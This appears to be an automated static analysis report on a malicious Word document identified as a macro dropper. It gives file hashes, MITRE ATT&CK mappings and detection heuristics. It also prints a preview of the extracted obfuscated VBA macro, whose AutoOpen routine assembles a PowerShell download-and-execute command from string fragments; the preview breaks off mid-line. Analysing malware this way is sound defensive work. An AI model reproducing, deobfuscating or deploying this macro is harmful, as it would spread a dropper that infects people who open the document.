Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c50902139d81f59f…

MALICIOUS

Office (OLE)

126.5 KB Created: 2018-02-13 13:51:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 972b1070d15609e441938fdcc7e42c7a SHA-1: 46cc38700abf0c1a51538d1b9bb3f8e29cf7671c SHA-256: c50902139d81f59ff810cc880d4c35644ee31451f11a428013c389457c6ac7cc
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating it's designed to execute an external payload. ClamAV identifies the file as 'Doc.Dropper.Agent-6447747-0', suggesting its purpose is to drop or download further malware. The obfuscated script makes it difficult to determine the exact payload, but the overall behavior points to a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6447747-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447747-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24826 bytes
SHA-256: f08ff0de306d14b68b71b2cffc2bdec3e6b4b7f827cebc2be781777f038e3383
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IsLhzhocwqWjLE"
Sub AutoOpen()
On Error Resume Next
zqYkizjRQ = tzU - Sgn(WhMbcLRqTKpPLY) - (8827269 - Tan(7749295) / 7594660 - ChrW(wqpfSjSXN))
THdTiJMtK = WIJwGWNvSlI - Sgn(cQPBdGqO) - (5562509 - Tan(1818684) / 875102 - ChrW(wjqrKFzfjERVms))
iJFozmFvf = DdjFD - Sgn(GMDLAXfVkMmco) - (4491287 - Tan(9773693) / 8781053 - ChrW(lYhJoJ))
Application.Run "HkbtiqAzm", VZUfKwITAk
StCDdnhZt = owERbrLdj - Sgn(nzc) - (1486044 - Tan(1613008) / 2722625 - ChrW(OuhVm))
RDlSwUBiD = tAzZubmuNDal - Sgn(SQuuPdSi) - (2158229 - Tan(1206464) / 377058 - ChrW(BjJsqbAzzG))
bHjTibAUS = jjTBE - Sgn(mEkIiuws) - (8658070 - Tan(9210880) / 5708613 - ChrW(WbZ))
End Sub
Function VZUfKwITAk()
On Error Resume Next
QiGavkiL = NZaO - Sgn(IbYPkkTV) - (2434647 - Tan(5409411) / 1640903 - ChrW(wTJYrm))
zvZpn = UJJcK - Sgn(voorrkZiXE) - (3845859 - Tan(4340050) / 1354472 - ChrW(BORwrHiBQfhWnP))
vsNnGTOmiz = OwwOjpvidVrif - Sgn(OpCkmKFsK) - (7106670 - Tan(410447) / 9446648 - ChrW(YJKVzKoIGVIXK))
ntNhCSESz = WzCvVwacv + Mid(dzFJAwvM + "fSwYqruuW7+aW7V.exi3uV+3uVMVaW7+aW7+aW7+aW'+'7iaW7+'+'ahXz'+'+hXzW7MaW7+aW7Veiah'+'X'+'z+hXzW7+aW7MV);fo3uV+3uVaW7+aW7reaW7+aW3uV+3uV7ach('+'pTXasfc iaW7+aW7n pTXADCXaWQWTczwmrJNdRpwz" + vWklimLTQwAjp, 9, 160)
QwZXhsSOXvr = OMmvWVSzuYqT - Sgn(UuNc) - (707824 - Tan(4091334) / 948126 - ChrW(ldtTWSfjwF))
AAOVhriEr = mSHvkOjOUiFAMG - Sgn(WkYYBTRGcjtbz) - (710823 - Tan(7485029) / 3154526 - ChrW(TrjpNwcNUHkCjc))
rutpkSV = MdvvKXDfUL - Sgn(MrmjKhNGh) - (4138323 - Tan(4979375) / 656518 - ChrW(mvKhM))
VjARmd = jndzZDa + Mid(qil + "TFavKEUSUaLJX hXz+hX'+'z= iMahXz+hXzW7+aW7V aW7+aW7htt'+'3uV+3uV'+'p:aW7+ahX'+'z+hXzW7//va'+'W7hXz+hXz+aW7aDMw" + FoW, 13, 95)
JMnBXR = WTnHhF - Sgn(XNCpIfSKNZ) - (5170755 - Tan(145796) / 1976156 - ChrW(wPiOXMAbwWj))
XwzfsvzTm = NsrYWBjGDXuM - Sgn(tcBZAKHEiZ) - (722814 - Tan(1782158) / 8651629 - ChrW(tivQf))
nrQrAHRV = RSaS - Sgn(DZUEfZVRhdjz) - (520167 - Tan(9155205) / 2368827 - ChrW(liSnPdrmb))
qKzAbLHXzr = DwGMOWIrFaPL + Mid(iillb + "bCMwafoMjTaDMMzSGwQppShOm'+'E[30]+3uVx3uV)hXz)  -cREPlace ([CHaR]71+[CHaR]81+[C'+'HaR]112),[CHaR]36  -cREPlace  hXzZcNhXz,[CHaR]124  -RePLACEhXz3uVhXz,[CHaR'+']39) ) ') -rePlaCE  'hXz',[chaR]39  -CrEpKmQzA" + wCpZuLnalIP, 19, 182)
QGDZqYQCZOY = FLSChRS - Sgn(bokkTFXSKdwOkw) - (5297724 - Tan(6675297) / 8261254 - ChrW(DJXDFYajdjsib))
YYKGOqQ = aXrqvz - Sgn(ZCHXEfJiIjkL) - (7399383 - Tan(2521618) / 1743808 - ChrW(XjMKnbraj))
pCCavhRS = ioN - Sgn(lnrH) - (5886920 - Tan(1371600) / 2989705 - ChrW(AsQzUwHSpA))
mjZBh = GPGPaCij + Mid(lnAwzirKjJitVS + "FzRfDNQmEVOjNvdtAr]34).repLAc'+'e(aW7dB7aW7,[stRi'+'nG][CHAr]92).repLAhXz+hXzce(aW7iMVaW7hXz+hAYnVusSwta" + jjHiaahhcY, 17, 78)
zohAbLwpa = DCGhwhpzv - Sgn(cRzKwKSPlcYPvL) - (8172186 - Tan(2957485) / 2992477 - ChrW(rOzDSUtRY))
SDtNTPf = FdB - Sgn(XzNpwHPBQIf) - (1541355 - Tan(1011027) / 7699720 - ChrW(vqjS))
zBYbsufau = GhwYw - Sgn(RhlQJIbor) - (9527104 - Tan(9518500) / 160029 - ChrW(INpwpY))
LinJHCmzXO = wUHjoAzKh + Mid(DwUVDwzTfiBL + "iSHK+hXz+aW7.LcrToStraW'+'7+aW7BaW3uV+3uV7+aW7SsiBahXz+hXzW7+aW7SsNgLcr(),aW7+aW7 pTXaW7+aW7SDC);&aW7+TiXjJTPauVkkAPP" + iTtpHvSNLiXRk, 5, 98)
ITSZQVTuR = QjIAoNLXIFkwmJ - Sgn(wIJ) - (9254196 - Tan(3384595) / 6026738 - ChrW(wrAdwJzfV))
Ejzio = ApOHq - Sgn(CHiKHtOauHuL) - (8016865 - Tan(6126225) / 3736877 - ChrW(UqkRzKPCXdkbv))
pDfYJOJ = vuHTHomUSFdZiq - Sgn(npppIV) - (4677819 - Tan(4353105) / 4872268 - ChrW(srcmiImfzMAE))
cNDKrKI = PFJdKYLo + Mid(qzpqVqhPzw + "IIQujNrPnZKQnaW7hXz+hXz,[stRinG]3uV+3uV[CHAr]96).repLAc'+'e(([CHAr]112+[CHAr]84+3uV+3uV'+'[ChXz+hXzHAr]88)'+',aW73u'+'V+3uV8xkaW7).rhXz+hXzepLAce(aW7Lcra3'+'uV+3'+'uVW7,[stR3uV+3uVinG][CHLlw" + jRwJwpPK, 14, 174)
amwIRpwM = iOjTQLCVArk - Sgn(QSoCqM) - (318611 - Tan(8391577) / 4225754 - ChrW(cXsJhvQjhwfq))
AukIOZJYPM =
... (truncated)